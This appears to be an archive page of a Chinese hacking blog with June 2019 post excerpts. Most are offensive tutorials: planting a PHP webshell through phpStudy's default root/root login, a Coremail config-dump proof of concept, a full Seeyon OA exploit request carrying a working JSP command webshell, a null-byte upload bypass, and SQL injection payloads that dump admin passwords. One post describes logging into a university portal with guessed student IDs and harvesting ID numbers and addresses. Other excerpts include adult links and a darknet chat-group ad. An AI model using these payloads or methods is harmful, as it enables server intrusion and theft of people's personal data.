网站首页 • 发表在 2019年06月 的所有文章
-
利用PHPstudy探针弱口令漏洞批量拿shell
关键字:phpStudy 探针 2014 搜到后随便找一个站 然后打开是这种的 弱口令:root 成功,如下图 然后进入phpmyadmin 后台账号是root密码也是root 接下来就是怎么拿shell了 探针上面有个绝对路径和探针路径,我们这里需要的是绝对路径。如图 进入后台我们需要打开变量 然后在变量里面找到general log 和 general log file 你可以用 CTRL+F 需要把general log 改成ON 把 general log file修改成绝对路径的地址。C:/phpStudy/WWW/.xxx.php >>>这个xxx.php是你一句话的地址 如图。 修改好后。我们需要把这个命令插入到我们指定的php文件里 如图。 ...
-
关于coremail的0day附带poc
import requests,sys def mailsmsPoC(url): url = url + “/mailsms/s?func=ADMIN:appState&dumpConfig=/” r = requests.get(url) if (r.status_code != ‘404’) and (“/home/coremail” in r.text): print “mailsms is vulnerable: {0}”.format(url) else: print “mailsms is safe!” if __name__ == ‘__main__’: try: mailsmsPoC(sys.argv[1]) except: print “usage: python poc.py http://hi-ourlife.com/” 修改url即可用 ...
-
Python爬虫之-爬取妹子图片
#coding=utf-8 import requests from bs4 import BeautifulSoup import os all_url = ‘http://www.mzitu.com’ #http请求头 Hostreferer = { ‘User-Agent’:’Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)’, ‘Referer’:’http://www.mzitu.com’ } Picreferer = { ‘User-Agent’:’Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)’, ‘Referer’:’http://i.meizitu.net’ } #此请求头破解盗链 start_html = requests.get(all_url,headers = Hostreferer) #保存地址 path = ‘G:\python\妹子\liang’ #找寻最大页数 soup = BeautifulSoup(start_html.text,”html.parser”) page = soup.find_all(‘a’,class_=’page-numbers’) max_page = page[-2].text same_url = ‘http://www.mzitu.com/page/’ for n in range(1,int(max_page)+1): ul = same_url+str(n) start_html = requests.get(ul, headers = Hostreferer) soup = BeautifulSoup(start_html.text,”html.parser”) all_a = soup.find(‘div’,class_=’postlist’).find_all(‘a’,target=’_blank’) for a in all_a: title = a.get_text() #提取文本 if(title != ”): print(“准备扒取:”+title) #win不能创建带?的目录 if(os.path.exists(path+title.strip().replace(‘?’,”))): #print(‘目录已存在’) flag=1 else: os.makedirs(path+title.strip().replace(‘?’,”)) flag=0 os.chdir(path + title.strip().replace(‘?’,”)) href = a[‘href’] html = requests.get(href,headers = Hostreferer) mess = BeautifulSoup(html.text,”html.parser”) pic_max = mess.find_all(‘span’) pic_max = pic_max[10].text #最大页数 if(flag == 1 and len(os.listdir(path+title.strip().replace(‘?’,”))) >= int(pic_max)): print(‘已经保存完毕,跳过’) continue for num in range(1,int(pic_max)+1): pic = href+’/’+str(num) html = requests.get(pic,headers = Hostreferer) mess = BeautifulSoup(html.text,”html.parser”) pic_url = mess.find(‘img’,alt = title) print(pic_url[‘src’]) #exit(0) html = requests.get(pic_url[‘src’],headers = Picreferer) file_name = pic_url[‘src’].split(r’/’)[-1] f = open(file_name,’wb’) f.write(html.content) f.close() print(‘完成’) print(‘第’,n,’页完成’) ...
-
武汉某大学-学生信息泄露
也是无聊的时候无意间逛见的,进入主题。 看到可能会想怎么进去,我就去百度搜了一下教务管理系统用户名和密码是多少 百度告诉我的答案普遍是账号是学号密码也是学号或者密码是123456, 接下来知道了那么我们该怎么去获取学号呢。 1.百度武汉xxxx职业技术学院学号 如图 接下来去试试此学号有无有用。 上面百度收集到的信息说是密码可能是学号也可能是123456 或者是别的试一试吧 运气不错进来了。那么就看看有没有别的信息了 我在学籍卡片处看到往下滑的时候看到了身份证号!!! 这已经涉及到信息泄露了。 接下来,我们在试试别的学号看能否进。 以此学号 推断一下 学号:1113033 7位数 试试1113034 能否进去 依旧可以用进 推断密码默认学号。学号是用递进的方式形成的, 我们看到了图上所示 院系:智能制造工程系 专业:包装技术与设计 学制:3.0 班级:11级包装技术与设计1班 我们看到了这些 再看学号(学号是1113034) 注意到什么没 11级 一班正好对应学号前面的111 那么把111修改成 1513001试试看呢。 成功 密码依旧是学号,那么就可以以此类推,但是我在这次进15级的这个学生我发现了,地址也有了, 就到这了吧。 此学校泄露信息。有姓名,身份证,地址。证件照。 ...
-
微博|肉感评选/柔软36C胸部
一个是“梁茶叔”带头举办的年度肉感评选,不只有瘦人身材才好,稍微胖一点前凸后翘体验更佳。 这些女人又给看胸又给看屁股的,知道你们很胖了还不行么。 另一个是“热带汽水”的网友,感到很沮丧,想要触摸一些36C柔软的东西,好心的网友给他准备了不少照片。 地址1:http://uee.me/aW4mq 地址2:http://uee.me/aW4mc ...
-
暗网流出的诡异图片!千万别被骗了...
暗网对于一般人来说比较神秘,因为它无法通过正常渠道进入,所以有些人会利用这一特点在网上编造图文故事,比如下面这三张被誉为从暗网流出的图片...... 长颈黑色不明生物 传闻:只要进过暗网的朋友一定看过这张照片,据说,有人在拍摄这个黑人男子时,他的背后突然出现了一个黑色长颈不明生物。 有人说这是一个长颈的外星人,也有人认为是召唤出来的恶魔,亦有人说那是一个木雕,直到现在也没有人知道这是什么生物...... 真相:其实这张照片根本不是从暗网流出的,而所谓的黑色不明生物,的确没有人知道是什么,因为这个生物根本就不存在...... 这张图其实是PS过的,据调查最早于2008年的匿名讨论区4chan中出现,未PS之前,那只是一个穿着白色短裤的半赤裸黑人小孩。 1.这张照片据说是“道西战争”中的大灰人。 真相:话说外星人都不穿衣服的吗? 这张照片展示的其实是位于塞尔维亚的名为BlackĆuprija的纪念碑,其修建于1962年。为了纪念在诺维萨德事件中的死难者。 1942年1月,匈牙利法西斯政府对南斯拉夫诺维萨德市等地抓捕游击队员。并以此为名逮捕监禁了大量的塞尔维亚人和犹太人,并对当地的平民进行了屠杀,共造成了约三千多人死亡。 这被认为是2010年俄罗斯地铁爆炸案的照片,照片中的女人身份未知 真相 :战斗民族的姑娘都这么凶悍吗? 这只是2013年的一部俄罗斯电影《地铁》的现场照 这部电影改编自同名小说。讲述的是由于管道泄漏引发的灾难,一行人在莫斯科的地铁中艰难求生的故事,和地铁爆炸案没有关系。 拍摄于同一地点的照片 相传图片中的人头是母亲来的,而在她的尸首左右两边的是她的儿女 这张“照片”收录于作者的系列作品“Haunted Memories”之中。 其他作品 ps 事实上,欧洲确实以前有一种特殊的的拍照方式,效果和上图类似。 5.这是真实中东暗杀现场的照片,极具历史价值< 真相 才怪 这张照片其实是1913年的悬疑电影fantômas :in the shadow of the guillotine的剧照而已。 这张照片据说在格鲁吉亚的一个餐馆的垃圾桶里发现,常用作“兔人”的都市传说的配图。 真相:摄影师Eliot Lee Hazel的系列摄影作品Poppy Filled Gang中的一张照片 真相:注意到右边的照相机镜头了吗? 这是中国现代艺术家朱冥在北京市中山公园进行“实验艺术”创作《1999年5月8日A号》时拍摄的照片。 暗网交流群,群文件会持续更新TOR相关东西、暗网网址等。。。QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL ...
-
SWAPIDC答题答案
注意答案排序可能不一样 第一题 第二题 第三题 第四题 ...
-
致远OA系统远程命令代码执行漏洞
1.致远OA A8无需认证代码执行漏洞 网站地址:http://127.0.0.1:8088/seeyon/index.jsp 因为不方便透露漏洞网址,就用127.0.0.1代替。网站页面如下↓↓↓ 2. 接下来用:/seeyon/htmlofficeservlet 来访问。http://127.0.0.1:8088/seeyon/htmlofficeservlet 如果出现了 DBSTEP V3.0 0 21 0 htmoffice operate err 哪就证明可能漏洞是存在的 3. 然后我们打开burp,需要POST一个shell上去.如何抓包就不说了。 然后点Go 4. 然后复制下面的jsp木马到POST包里面如图 DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV OPTION=S3WYOSWLBSGr currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66 CREATEDATE=wUghPB3szB3Xwg66 RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6 originalFileId=wV66 originalCreateDate=wUghPB3szB3Xwg66 FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6 needReadFile=yRWZdAS6 originalCreateDate=wLSGP4oEzLKAz4=iz=66 <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println(" “+excuteCmd(request.getParameter(“cmd”)) + “ “);}else{out.println(“:-)”);}%>6e4f045d4b8506bf492ada7e3390d7ce 5. 上面成功插入了jsp一句话木马接下来如下。 默认文件名是:test123456 然后访问网站 http://127.0.0.1:8088/seeyon/test.jsp 6. 然后运行以下代码 /seeyon/test.jsp?pwd=asasd3344&cmd=whoami 完整如这>>> http://127.0.0.1:8088/seeyon/test.jsp?pwd=asasd3344&cmd=whoami 运行成功 administrator权限能干什么就不用多说了吧 请勿进行违法操作 ...
-
一次实战拿shell上传绕过
一、物理路径 在url后面随便输入个字符,得到网站物理路径 二、whois信息 没有查到其他whois信息 三、Whatweb 四、端口 21端口是文件传输协议,如果被非正常手段登录,将会面临服务器/空间文件泄露问题 3306端口是mysql数据库的默认端口,如果被非正常手段登录,将会面临数据库泄露问题 445是曾经暴出”永恒之蓝”病毒的端口 五、后台 后台系统及型号 六、编辑器 抓包获取编辑器地址,并且发现是dede下的编辑器,估计模板也是dede二次加工的了。 七、拿shell(仅列举一种方法-上传绕过) 直接上传一句话木马(php后缀),提示文件类型不正确 将一句话木马后缀修改为jpg格式,继续上传 。 上传成功。打开burpsuite,重新上传jpg后缀的一句话木马 。 将yjh.jpg修改为yjh.php[空格]。一定要在修改完的php后缀后面加上一个空格。如下图 然后点击action里面的send to repeater 。 打开repeater下的Hex,查找到yjh.php文件,修改对应行Hex值,由20改为00 。 即可发现原来的空格已经没有了 。 然后点击Go,放包。 链接访问成功,然后拿出中国菜刀,连接shell。 ...
-
C语言-扬帆起航
用C语言在控制台输出 一些字符图案!!! 编译器:VS2019版本 代码如下 #include<stdio.h> #include<windows.h> int color(int c) { SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), c); //更改文字颜色 return 0; } int main() { color(13); printf(" \n"); printf(" | | | \n"); printf(" )_) )_) )_) \n"); printf(" )___))___))___)╲_ \n"); printf(" )____)____)_____)╲╲_ \n"); printf(" H ____E___|__L__|__L__|__O__╲╲╲__________ \n"); printf(" ---------╲_____偏锋表哥_____扬帆起航_____________╱--------- \n"); printf(" ^^^^^ ^^^^^ ^^^^ ^^^^^^^ ^^^^^ ^^^ \n"); printf(" \n"); return 0; } 效果图 ...
-
SQL注入语法
1.判断有无注入点: http://127.0.0.1/index.asp?id=1 and 1=1 http://127.0.0.1/index.asp?id=1 and 1=2 http://127.0.0.1/index.asp?id=1′ 2.猜字段数: http://127.0.0.1/index.asp?id=1 order by 字段数 例如: http://127.0.0.1/?id=index.asp? order by 11 http://127.0.0.1/?id=index.asp? order by 12 order by 11页面显示正常 order by 12 页面报错所以字段为11 3.暴露管理员用户、密码: http://127.0.0.1/index.asp?id=1 union select 1,2,3,4,5,6,7,8,9,10,11 from admin 1、在链接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin】,页面显示数字为2和3 2、在链接后面添加语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】即可暴露管理员用户名和密码 http://127.0.0.1/index.asp?id=1 union select 1,admin,password,4,5,6,7,8,9,10,11 from admin 3、到此,即可知道管理员用户名:admin和密码:123456 >>>比较老的一种sql注入.大佬勿喷...
-
中国拟立密码法明确任何组织或个人不得窃取他人加密信息
8密码法草案25日提请十三届全国人大常委会初次审议。草案明确,任何组织或者个人不得窃取他人的加密信息,不得非法侵入他人的密码保障系统,不得利用密码从事危害国家安全、社会公共利益、他人合法权益的活动或者其他违法犯罪活动。 你的密码安全吗?毒蜂教你密码设置,速收学习!123456、888888、5201314……这些数字你熟悉吗?如何设置一个安全性足够高的密码? 教你设置一个完美密码 1.谐音混合法 可以利用数字的谐音或相似的字符来设计密码。例如生日为“19950824则可以设置为“199MO82s 2.造句法 使用一句容易记住的句子。例如“吃葡萄不吐葡萄皮则可以设置为“ cptbtptp 教你设置一个完美密码 3.6步密码设置法 第一步:密码不要过短,最好大于8位数 第二步:使用一句话的缩写作为基础密码 例如“ just for you”的缩写是“jfy" 第三步:加上数字可使旱础密码更复杂 密码增强为“2018jfy" 第四步:加上符号可进行强化 密码增强为“2018jfy?" 第五步:使用大小写进一步强化 密妈增强为“2018y" 第六步:创建一个规则,在不同的网站使用不同的密码 例如:新浪微博+密码则为“XWB2018jfy?" 密码便用小贴士 1.不要一码多用 一个密码打天下”危验系数最高。黑客也会利用用户码走天下”的习惯,从攻击脆弱的小网站入手,最终获取用户的登录密码。 2.密码12位最合适 密码长固然安全性会提高,但不易记住。综合考虑安全、方便等因素,12位密码较为适当。 3.重要密码要定期更换 黑客一般通过反复尝试普遍性的密码:便可轻松掌握多个账户。所以,車要的密码要养成经常更新的习惯. 4.注意公共设备登录 在公共区域使用电子设备进行账户登录时,不要点击保存密码的功能选项。 5.采用多方验证 在设置账户时,可采用多方验证的方式,如手机验证码验证、回答问题验证等。同时在手机、电脑等电子设备中一定要安装防护软件。 6.重要账号单独设置 网上银行、网上支付、聊天账号等重要账号单独设置密码,并定期修改密码,可有效避免网站数据库泄露影响到自身账号。 必须注意日个手机支付坏习惯 不设手机屏保密码 不少人为了图省事,干脆不设手机密保,这样亳无隐私。跳过软件直接通过手机浏览器购物在浏览器购物容易出现钓鱼网站,再加上支付过程的极度简化,容易对消费者的财产造成威助。 不加辨别蹭免费网络 公共WF常被不法分子移槽木马及钓鱼网站,不但安全隐患多,而且分分钟盗窃你的个人信息。 蓝牙保持开启状态 智能手机可以通过蓝牙传播病毒,别人通过蓝牙间谍软件也可以查看你的电话本、信息、文件,修改你的音量,替你发号等。 5.淘汰手机时不彻底删除私人信息旧机不处理就出售,里面的个人信息会被拿到你手机的人知晓。 6.下载山塞软件下载应用软件要选择大型的应用商店下载,避免出现木马病毒。 7.随意点击手机短信链接活动获奖、邀请你查看相册、提示你密码出现问题等等的链接,还是不要随意去点击,应先想办法核实直实性。 8.见二维码就扫 二维码的背后可能会隐藏病毒、木马,你手机里的个人信息可就很轻易地被别人盗取了 密码法草案25日提请十三届全国人大常委会初次审议。草案明确,任何组织或者个人不得窃取他人加密信息,不得非法侵入他人密码保障系统,不得利用密码从事危害国家安全、社会公共利益、他人合法权益的活动或其他违法犯罪活动 你能用大脑记住的密码,都是不靠谱的密码 但是,在2019年,想要保护好自己的密码,应该怎么做? 牢记一点:任何一个你正在使用的网站或app都应该有一个单独的密码。这里就需要密码管理器了。某种程度上来讲,他们与很多家庭在90年代摆在电脑旁边记密码用的小本子差不多。 然而与密码本不一样,这些工具更加的安全,由一个只有你知道的“主密码”锁定,使这个数字保险箱里的内容只有你能够访问。当你注册一个新的网站时,你照常输入所有信息。当你到了输入密码的步骤时,不要输入你惯常使用的密码,点击浏览器上的密码管理器图标,解锁它,然后会生成一个新的随机的密码。这些密码会比你自己能记得住的更长更复杂——而且他们会被储存起来方便日后使用。 ...
-
简单一招查出有没有人在你电脑里面“偷”资料
简单一招查出有没有人在你电脑里面“偷”资料 1.左下角 找到“运行” 2. 在运行里面输入 regedit 3.然后按下面的目录 依次打开 HKEY_LOCAL_MACHINE/SYSTEM/CurrentContorSet/Enum/USBSTOR/ Disk&Ven_SanDisk&Prod_Ultra_USB_3.0&Rev_1.00 这个就是使用过的U盘目录 我的电脑是这个 4.我电脑上用过的U盘太多 我就随便选择一个 右边这里就是 使用过的痕迹 5. 这里 右键点击权限 6.打开后 就是这个界面 然后我们把 拒绝下面的选项 全部 √ 上 这样就可以 禁止 这个U 盘 在我们的电脑上“读写”了 (每个U盘的ID都是唯一的) ...
-
解决Win7系统开机显示one or more table pointers are invalid
WIN7电脑系统 一开机就显示:fatal error: one or more table pointers are invalid modification could be unsafe 按回车可进入系统 (这种情况很多时候是发生在装有固态硬盘的电脑上) 解决方法 先进入系统 点击左下角开始 开始 --运行-- cmd (以管理员身份运行) 输入slmgr -upk (卸载秘钥) 回车 稍等一会 就会出现卸载成功的界面 然后重启一遍 再用别的激活工具激活一下系统 再重启 ,就不会显示one or more table pointers are invalid。 ...
-
CVE-2019-0708漏洞检测工具
CVE-2019-0708漏洞被称为“永恒之蓝”级别的漏洞,只要开启Windows远程桌面服务(RDP服务)即可被攻击。 有大佬在GitHub上公布CVE-2019-0708的检测工具,并提交了MSF的auxiliary模块。因此,使用MSF即可对目标计算机进行漏洞检测。 GitHub项目:https://github.com/zerosum0x0/CVE-2019-0708 MSF模块:https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb 演示环境:Kali、Windows Server 2008 R2 64位。 Windows服务器需要开启远程桌面服务。 使用方法: 第1步:下载auxiliary模块 从GitHub下载cve_2019_0708_bluekeep.rb文件,把该文件放到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp目录下。 第2步:启动MSF 第3步:使用cve_2019_0708_bluekeep检测模块 use auxiliary/scanner/rdp/cve_2019_0708_bluekeep 第4步:设置目标计算机IP set RHOSTS 192.168.56.133 第5步:开始检测 exploit 如下图红框显示,目标计算机存在CVE-2019-0708漏洞。 ...